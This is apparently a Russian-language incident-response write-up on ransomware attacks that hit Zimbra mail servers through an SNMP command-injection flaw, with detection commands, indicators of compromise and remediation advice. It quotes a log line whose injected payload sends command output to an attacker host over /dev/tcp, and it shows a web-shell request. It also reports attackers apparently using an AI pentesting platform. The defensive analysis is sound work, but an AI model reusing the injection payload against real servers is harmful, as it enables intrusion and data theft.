
Недавно наша команда по реагированию на инциденты (PT ESC IR) столкнулась с новой атакой ransomware-группировок на почтовые серверы Zimbra с использованием уязвимости CVE-2026-73570 и шифровальщика TargetZimbra. По информации из открытых источников аналогичные атаки массово фиксируются на серверах Zimbra с середины августа.
Дисклеймер: если вы используете неактуальную версию ПО Zimbra и не обнаружили на своем почтовом сервере приведенных ниже индикаторов компрометации конкретной кампании шифровальщика TargetZimbra, то это не значит, что ваш сервер гарантированно не скомпрометирован. Уязвимость CVE-2026-73570 может использоваться другими злоумышленниками, например, для установки майнеров, а также APT-группировками, нацеленными на компрометацию инфраструктуры всей организации.
Уязвимость CVE-2026-73570 позволяет атакующему осуществлять внедрение и выполнение вредоносных команд на почтовом сервере Zimbra с правами пользователя zimbra без предварительной аутентификации в результате недостаточной санации ввода в компоненте SNMP.
Для успешной эксплуатации на почтовом сервере должна быть установлена версия ПО Zimbra Collaboration Suite ниже 10.1.20, а также установлен пакет zimbra-snmp и включены SNMP-уведомления. Уязвимость эксплуатируется в результате отправки специально сформированного SMTP-запроса через порты 25, 465 или 587.
Сценарий атаки
В результате эксплуатации уязвимости CVE-2026-73570 злоумышленники создают на почтовом сервере файл
/opt/zimbra/jetty_base/webapps/zimbra/public/version.txt(илиversions.txt), содержащий сведения об используемой на сервере версии ПО Zimbra. Созданный файл является для атакующего индикатором успешной эксплуатации уязвимости.На следующем этапе злоумышленники загружают JSP-шеллы в директорию почтового сервера
/opt/zimbra/jetty_base/webapps/zimbra/public/. Кроме того, зафиксировано внедрение на сервер хакерского инструмента Gsocket. Ранее мы уже писали подробную заметку о том, как детектировать инструмент Gsocket.Далее злоумышленники загружают шифровальщик TargetZimbra, написанный на языке Go. После запуска указанный вредоносный модуль шифрует файлы с использованием алгоритма ChaCha20 в каталоге /opt/zimbra/ и его подкаталогах.
После шифрования файлов шифровальщик изменяет их расширение на
.elock, а также создает в зашифрованных директориях файлы!README_RECOVER.txt, содержащие контактную информацию и сведения для выкупа расшифровки данных. По окончании работы вредоносный модуль TargetZimbra удаляет себя из системы.
Как проверить ваш почтовый сервер Zimbra на наличие признаков компрометации
-
В основном системном журнале почтовой службы
/var/log/maillogзаписи, содержащие подстрокуchanged from stopped to, перед которой записана shell-команда или иная подозрительная нагрузка, являются признаком эксплуатации уязвимости CVE-2026-73570.Для поиска вредоносных событий на вашем сервере может использоваться следующая команда:
grep "changed from stopped to" /var/log/maillogПример выполнения команды
idи передачи ее вывода на С2-сервер злоумышленников:Aug 29 14:23:46 zimbra-server postfix/submission/smtpd[108829]: improper command pipelining after EHLO from unknown[[REDACTED_IP_1]]: : Service status change: h ;id>/dev/tcp/[REDACTED_IP_2]/1337; changed from stopped to running\r\nQUIT\r\n - время эксплуатации уязвимости: 29 августа 2026 года в 14:23:46; - [REDACTED_IP_1]: С2 адрес злоумышленников; - id>/dev/tcp/[REDACTED_IP_2]/1337: команда для выполнения на системе. Наличие нестандартных JSP-файлов, которые не относятся к ПО Zimbra и были созданы либо изменены за последние месяцы в каталоге
/opt/zimbra/jetty_base/webapps/zimbra/и во всех его подкаталогах. Характерными признаками вредоносных JSP-файлов являются наличие обфусцированного кода, закодированных строк, а также нетипичная обработка GET- и POST-запросов.
Для поиска недавно созданных или измененных JSP-файлов на вашем сервере могут использоваться следующие команды:
find /opt/zimbra/jetty_base/webapps/zimbra/ -type f -iname '*.jsp' -newermt '2026-07-01'(поиск по дате изменения файла)
find /opt/zimbra/jetty_base/webapps/zimbra/ -type f -iname '*.jsp' -newerBt '2026-07-01'(поиск по дате создания файла)
Обратите внимание, что не все файловые системы Linux хранят дату создания файла. Если система не отслеживает указанную метку, то команда find выдаст ошибку. Также проверьте сервер антивирусными средствами.В журнале доступа WEB-сервера (например, для WEB-сервера Nginx стандартное расположение
/var/log/nginx/access.log) записи об обращении к нестандартным JSP-файлам (с кодом ответа 200), расположенным в каталоге/opt/zimbra/jetty_base/webapps/zimbra/и во всех его подкаталогах (в частности, часто используемый каталог/opt/zimbra/jetty_base/webapps/zimbra/public/), могут свидетельствовать о наличии WEB-shell'ов на почтовом сервере. Если WEB-shell получает команды через GET-запрос, то передаваемая команда будет отображена в журнале.
Пример вывода результата выполнения командыlsв браузер атакующего:
[REDACTED_IP] - - [29/Aug/2026:12:41:35 +0000] GET /public/bzng.jsp?p=ls HTTP/1.0 200 443 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 34889 - [REDACTED_IP]: С2 адрес злоумышленников; - [29/Aug/2026:12:41:35 +0000]: время обращения к WEB-shell; - public/bzng.jsp: расположение WEB-shell; - ls: выполняемая команда.
Кроме того, исследуя сетевую инфраструктуру злоумышленников, мы обнаружили WEB-панели платформы CyberStrikeAI, размещенные на нескольких С2-серверах (скриншоты 1 и 2).

CyberStrikeAI — открытая платформа, предназначенная для автоматизации тестирования на проникновение с использованием ИИ.

Наличие работающей платформы на С2-сервере злоумышленников может указывать на ее применение как на отдельных этапах атаки (например, первоначальной компрометации сервера), так и в рамках всего инцидента.
Наши рекомендации
Обновить ПО Zimbra на вашем почтовом сервере до актуальной версии. В идеале также переустановить ОС сервера с переносом всех почтовых данных.
В случае невозможности быстрого обновления ПО временным решением может быть отключение SNMP-уведомлений и удаление пакета
zimbra-snmp.Кроме того, проверьте почтовый сервер антивирусными средствами, а также вручную посмотрите нестандартные JSP-файлы, созданные за последние месяцы в служебных каталогах Zimbra.
Индикаторы компрометации
Файловые индикаторы
/opt/zimbra/jetty_base/webapps/zimbra/public/version.txt или versions.txt — файл, содержащий версию ПО Zimbra;
/opt/zimbra/jetty_base/webapps/zimbra/public/[Filename].jsp — WEB-shell;
/opt/zimbra/log/defunct — Gsocket;
elockc[a-z] (например, elockcl) — шифровальщик;
runloop.sh — скрипт, создаваемый шифровальщиком;
!README_RECOVER.txt — записка злоумышленников;
*.elock — файлы с расширением .elock.
Сетевые индикаторы
135.136.63.63 139.28.49.138 146.70.169.246 193.24.211.91 193.32.126.168 31.177.110.136 37.32.73.156 64.62.156.162 64.62.156.222 64.62.156.94 88.214.21.183 89.116.171.182 89.117.94.35
Gsocket
*.gs.thc.org gsocket.io 152.53.173.29 152.53.173.30 176.65.149.52 212.132.98.170 217.154.53.116 217.154.53.187 45.90.4.121 45.90.4.128 51.91.190.241 51.91.190.242
(Источник: https://t.me/ptescalator)
AlexSeeker
На 10.1.20 тоже все работает, смоделируйте ситуацию, поможет только - убить сервис snmp полностью, не использовать порт 25, 465, и разворачивать граничный pmg например, с sasl+tls, и фильтрацией